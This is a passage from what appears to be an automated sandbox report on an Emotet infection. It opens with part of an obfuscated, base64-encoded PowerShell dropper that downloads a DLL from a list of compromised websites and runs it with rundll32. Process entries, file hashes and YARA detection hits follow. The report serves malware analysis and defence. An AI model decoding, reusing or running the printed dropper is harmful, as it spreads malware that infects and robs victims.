AvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnACcAKwAnAGUAZAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAGMAJwArACcAZwBpACcAKwAnAC0AYgBpAG4ALwBRACcAKQArACgAJwBnACcAKwAnAC8AQAAnACkAKwAoACcAcwAnACsAJwBnACAAJwApACsAJwB5AHcAJwArACgAJwAgAGEAaABzADoAJwArACcALwAnACkAKwAoACcALwB0AGgAZQBvACcAKwAnAC4AJwApACsAJwBkACcAKwAoACcAaQBnACcAKwAnAGkAJwApACsAKAAnAHQAYQBsACcAKwAnAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGEAZAAnACsAJwBtAGkAbgAnACkAKwAoACcALwAnACsAJwBaAHkAbAAnACkAKwAnADIAJwArACgAJwAvAEAAJwArACcAcwAnACkAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaAAnACsAJwBzADoAJwArACcALwAvAHUAJwApACsAJwBtAG0AJwArACcAYQBoACcAKwAnAHMAJwArACgAJwB0AGEAJwArACcAcgBzAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwBhACcAKwAnAHAAcAAnACsAJwBfACcAKwAnAG8AbAAnACsAJwBkACcAKwAnAF8AbQAnACsAJwBhACcAKwAoACcAeQBfACcAKwAnADIAJwApACsAJwAwACcAKwAnADEAOAAnACsAJwAvAGEAJwArACgAJwBzAHMAZQB0ACcAKwAnAHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAB4AC8AQABzAGcAJwArACcAIAAnACkAKwAoACcAeQB3ACcAKwAnACAAYQBoAHMAOgAvACcAKQArACcALwB3ACcAKwAnAHcAJwArACgAJwB3AC4AdAAnACsAJwBlAGUAJwApACsAKAAnAGwAZQAnACsAJwBrAGQAZQBkACcAKQArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AYwAnACkAKwAoACcAZwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuACcAKwAnAC8ATAAnACkAKwAoACcAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAFAAbABhAEMARQAiACgAKAAoACcAcwBnACcAKwAnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAcwBlACcAKwAnAHcAJwApACsAJwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQAnACsAJwBlAGYAJwApACsAJwBmACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkAKQBbADIAXQApAC4AIgBTAFAAbABgAEkAVAAiACgAJABRADAANABQACAAKwAgACQAQgBiADIAdQAyAGMAOQAgACsAIAAkAEUANgAyAFgAKQA7ACQARwA3ADQAWAA9ACgAKAAnAEMAOAAnACsAJwAzACcAKQArACcARAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFYAegB2ADMAMgBkADIAIABpAG4AIAAkAE4AcwB6AG8AOABpADEAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAJwArACcAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAFMAeQBzAFQARQBNAC4AbgBlAHQALgB3AGUAQgBDAEwASQBlAG4AdAApAC4AIgBEAG8AYAB3AGAATgBsAG8AYABBAEQARgBJAEwARQAiACgAJABWAHoAdgAzADIAZAAyACwAIAAkAFIAZAB0AGEAbAA0AHYAKQA7ACQAWAA2AF8AVQA9ACgAJwBBACcAKwAoACcANAAxACcAKwAnAEUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAUgBkAHQAYQBsADQAdgApAC4AIgBsAGAARQBuAGcAdABIACIAIAAtAGcAZQAgADQAMwAxADMAMgApACAAewAuACgAJwByAHUAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABSAGQAdABhAGwANAB2ACwAKAAoACcAQQBuAHkAUwAnACsAJwB0AHIAJwApACsAJwBpACcAKwAnAG4AZwAnACkALgAiAFQATwBgAFMAVAByAGAASQBuAGcAIgAoACkAOwAkAEYAMgBfAFkAPQAoACcAQwAnACsAKAAnADAAJwArACcAMwBWACcAKQApADsAYgByAGUAYQBrADsAJABLADgAOQBaAD0AKAAnAEcAMwAnACsAJwA2AEwAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADAAMABLAD0AKAAnAFgAJwArACgAJwA2ADUAJwArACcASAAnACkAKQA=
                                                                                  Imagebase:0x13f840000
                                                                                  File size:473600 bytes
                                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Reputation:high

                                                                                  General

                                                                                  Start time:20:58:51
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                                                                                  Imagebase:0xfffc0000
                                                                                  File size:45568 bytes
                                                                                  MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:58:51
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll AnyString
                                                                                  Imagebase:0x440000
                                                                                  File size:44544 bytes
                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2124049424.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2125246682.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2124029835.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:58:58
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dll',#1
                                                                                  Imagebase:0x440000
                                                                                  File size:44544 bytes
                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2135634388.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2134225145.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2134257328.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:59:02
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',EFdBQhtlp
                                                                                  Imagebase:0x440000
                                                                                  File size:44544 bytes
                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2144436282.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2144335956.0000000000180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2145866695.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:59:07
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fqtgesmysxdwyacz\egqmlweitpkpoyg.oym',#1
                                                                                  Imagebase:0x440000
                                                                                  File size:44544 bytes
                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2161670466.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2158222517.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2158182708.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:59:13
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',EsaISiHxs
                                                                                  Imagebase:0x440000
                                                                                  File size:44544 bytes
                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2168147039.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2168130211.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2173566847.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:moderate

                                                                                  General

                                                                                  Start time:20:59:18
                                                                                  Start date:27/01/2021
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wdsoicjmrbzpb\qoakbojlblcm.udm',#1
                                                                                  Imagebase:0x440000
                                                                                  File size:44544 bytes
                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2345582268.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2345600716.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2346676454.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:moderate

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >